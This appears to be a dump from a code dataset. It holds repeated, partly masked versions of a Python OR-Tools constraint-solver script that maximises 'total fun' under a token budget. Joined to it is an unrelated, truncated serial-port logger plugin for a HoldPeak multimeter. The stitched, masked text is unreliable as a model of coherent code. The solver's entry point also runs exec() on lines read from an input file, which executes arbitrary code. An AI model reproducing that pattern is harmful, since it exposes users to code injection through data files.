1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\n<mask token>\n\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef ortoolsSolverReduceVar(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > 
cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverNeg(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = 
None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef ortoolsSolverReduceVar(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n 
model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverNeg(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n 
).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\nif __name__ == '__main__':\n file = sys.argv[1]\n f = open(file)\n for i in range(5):\n exec(f.readline())\n f.close()\n [sat, token, play, total_fun, time] = ortoolsSolverComb(num, cap,\n refill, fun, goal)\n print('Status:', sat)\n if sat == 'OPTIMAL':\n print('Maximum total fun:', total_fun)\n", "step-4": "from ortools.sat.python import cp_model\nimport os\nimport math\nimport csv\nimport sys\n\n\ndef ortoolsSolverReduceVar(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef 
ortoolsSolverNeg(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\nif __name__ == '__main__':\n file = sys.argv[1]\n f = open(file)\n for i in range(5):\n exec(f.readline())\n f.close()\n [sat, token, play, total_fun, time] = ortoolsSolverComb(num, cap,\n refill, fun, goal)\n print('Status:', sat)\n if sat == 'OPTIMAL':\n print('Maximum total fun:', total_fun)\n", "step-5": "from ortools.sat.python import cp_model\nimport os\nimport math\nimport csv\nimport sys\n\ndef 
ortoolsSolverReduceVar(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i)\n for i in range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i)\n for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i)\n for i in range(1, num + 1)]\n total_fun = sum([fun[i] * play[i] for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <=\n cap).OnlyEnforceIf(compare[i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] +\n refill).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i)\n for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i)\n for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i)\n for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([fun[i] * play[i] for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <=\n cap).OnlyEnforceIf(compare[i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] +\n refill).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverNeg(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i)\n for i in range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i)\n for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i)\n for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i)\n for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun')\n model.Add(total_fun == sum([fun[i] * play[i] for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <=\n cap).OnlyEnforceIf(compare[i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= 
token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] +\n refill).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i)\n for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i)\n for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i)\n for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i)\n for i in range(1, num + 1)]\n total_fun = sum([fun[i] * play[i] for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <=\n cap).OnlyEnforceIf(compare[i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] +\n refill).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\nif __name__ == '__main__':\n file = sys.argv[1]\n f = open(file)\n for i in range(5):\n exec(f.readline())\n f.close()\n [sat, token, play, total_fun, time] = ortoolsSolverComb(\n num, cap, refill, fun, goal)\n print('Status:', sat)\n if sat == 'OPTIMAL':\n print('Maximum total fun:', total_fun)\n", "step-ids": [ 2, 4, 5, 6, 7 ] }
[ 2, 4, 5, 6, 7 ]
try:
    from LoggerPlugin import LoggerPlugin
except ImportError:
    from RTOC.LoggerPlugin import LoggerPlugin

from .holdPeak_VC820.vc820py.vc820 import MultimeterMessage
import serial
import sys
import traceback

from PyQt5 import uic
from PyQt5 import QtWidgets
import logging as log
log.basicConfig(level=log.INFO)
logging = log.getLogger(__name__)

devicename = "HoldPeak"
default_device = 'COM7'
SERIAL_BAUDRATE = 2400
SERIAL_BYTESIZE = 8
SERIAL_TIMEOUT = 1
SAMPLERATE = 1

class Plugin(LoggerPlugin):
    """
Zeichnet die Messdaten eines HoldPeak VC820 Multimeters auf
    """
    def __init__(self, *args, **kwargs):
        # Plugin setup
        super(Plugin, self).__init__(*args, **kwargs)
        self.setDeviceName(devicename)
        self.smallGUI = True

        self._last_value = 0
        self._jump_allowed = True
        # Data-logger thread
        self.setPerpetualTimer(self._updateT, samplerate=SAMPLERATE)
        # self.updater.start()

    def __openPort(self, portname=default_device):
        # Communication setup
        #self.portname = "/dev/ttyUSB0"
        #self.portname = "COM7"
        self.portname = portname
        #################################################################################
        # os.system("sudo chmod a+rw /dev/ttyUSB0")
        # #######
        # uncomment this line if you do not set device rules:
        # > sudo nano /etc/udev/rules.d/50-myusb.rules
        # > * SUBSYSTEMS=="usb", ATTRS{idVendor}=="067b", ATTRS{idProduct}=="2303", GROUP="users", MODE="0666"
        # > [Strg+O, Strg+X]
        # > sudo udevadm control --reload
        # Ref: http://ask.xmodulo.com/change-usb-device-permission-linux.html
        #################################################################################
        try:
            self._serial_port = serial.Serial(
                self.portname, baudrate=SERIAL_BAUDRATE, parity='N', bytesize=SERIAL_BYTESIZE, timeout=SERIAL_TIMEOUT, rtscts=1, dsrdtr=1)
            # dtr and rts settings required for adapter
            self._serial_port.dtr = True
            self._serial_port.rts = False
            # -------------
            return True
        except Exception:
            tb = traceback.format_exc()
            logging.debug(tb)
            return False

    # THIS IS YOUR THREAD
    def _updateT(self):
        valid, value, unit = self._get_data()
        if unit == "V":
            datanames = ["Spannung"]
        elif unit == "A":
            datanames = ["Strom"]
        elif unit == "Ohm":
            datanames = ["Widerstand"]
        elif unit == "°C":
            datanames = ["Temperatur"]
        elif unit == "F":
            datanames = ["Kapazität"]
        elif unit == "Hz":
            datanames = ["Frequenz"]
        else:
            datanames = [unit]
        if valid:
            if abs(self._last_value-value) >= 2 and not self._jump_allowed:
                self._jump_allowed = True
            else:
                self.stream(y=[value], snames=datanames, unit=unit)
                self._jump_allowed = False
            self._last_value = value

    def loadGUI(self):
        self.widget = QtWidgets.QWidget()
        packagedir = self.getDir(__file__)
